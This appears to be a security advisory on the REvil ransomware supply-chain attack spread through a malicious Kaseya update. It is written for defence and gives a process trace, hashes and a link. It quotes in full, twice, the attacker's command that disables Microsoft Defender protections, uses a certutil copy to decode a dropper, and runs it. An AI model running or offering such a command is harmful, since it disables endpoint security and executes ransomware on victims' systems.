Active Threat – Happening Now
We are monitoring a Supply Chain attack outbreak utilizing REvil ransomware. At this time it appears to stem from a malicious Kaseya update. A malicious DLL containing the REvil Ransomware (C:\Windows\mpsvc.dll) is side-loaded into a legitimate older copy of Microsoft Defender (C:\Windows\MsMpEng.exe) to run the encryption from a legitimate-looking process.
Attack chain contains code that attempts to disable Microsoft Defender Real-Time Monitoring, Script Scanning, Controlled Folder Access, etc. via PowerShell.
Process Trace:
1. C:\windows\msmpeng.exe
2. C:\kworking\agent.exe
3. C:\Windows\SysWOW64\cmd.exe
4. (Listed Below)
5. AgentMon.exe
6. C:\Windows\System32\services.exe
“c:\windows\system32\cmd.exe”
/c ping 127 0 0.1 -n 4307 > nul & c:\windows\system32\windowspowershell\v1 0 \powershell.exe set-mppreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess disabled -EnableNetworkProtection auditmode -Force $true -MAPSReporting disabled -SubmitSamplesConsent neversend & copy-item /Y c:\windows\system32\certutil.exe c:\windows\cert.exe & Write-Output % random% >> c:\windows\cert.exe & c:\windows\cert.exe () -decode c:\kworking\agent.crt c:\kworking\agent.exe & remove-item /q $true /f c:\kworking\agent.crt c:\windows\cert.exe & c:\kworking\agent.exe
/c ping 127 0 0.1 -n 4307 > nul & c:\windows\system32\windowspowershell\v1 0 \powershell.exe set-mppreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess disabled -EnableNetworkProtection auditmode -Force $true -MAPSReporting disabled -SubmitSamplesConsent neversend & copy-item /Y c:\windows\system32\certutil.exe c:\windows\cert.exe & Write-Output % random% >> c:\windows\cert.exe & c:\windows\cert.exe () -decode c:\kworking\agent.crt c:\kworking\agent.exe & remove-item /q $true /f c:\kworking\agent.crt c:\windows\cert.exe & c:\kworking\agent.exe
The following command is run, which:
• Disables Real-Time Monitoring
• Disables IPS
• Disables Cloud Lookup
• Disables script scanning
• Disabled Controlled Folder Access (ransomware prevention feature)
• Disables Network Protection
• Stops cloud sample submission
• Disables Real-Time Monitoring
• Disables IPS
• Disables Cloud Lookup
• Disables script scanning
• Disabled Controlled Folder Access (ransomware prevention feature)
• Disables Network Protection
• Stops cloud sample submission
Agent.crt is dropped by the Kaseya VSA. It is then decoded with certutil to carve out agent.exe. Inside agent.exe it has 2 files embedded, MsMpEng.exe and mpsvc.dll. The legitimate Windows Defender executable was used to side-load the REvil Ransomware
Hashes
agent.exe (dropper): d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
mpsvc.dll: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
cert.exe: 605045dc7b338492bdc2de5a1c3e01d64d3cc43aed429edbe88ee6f2feba284c
We will update as more information become available.
To Read More About This Attack: https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
To Read More About This Attack: https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
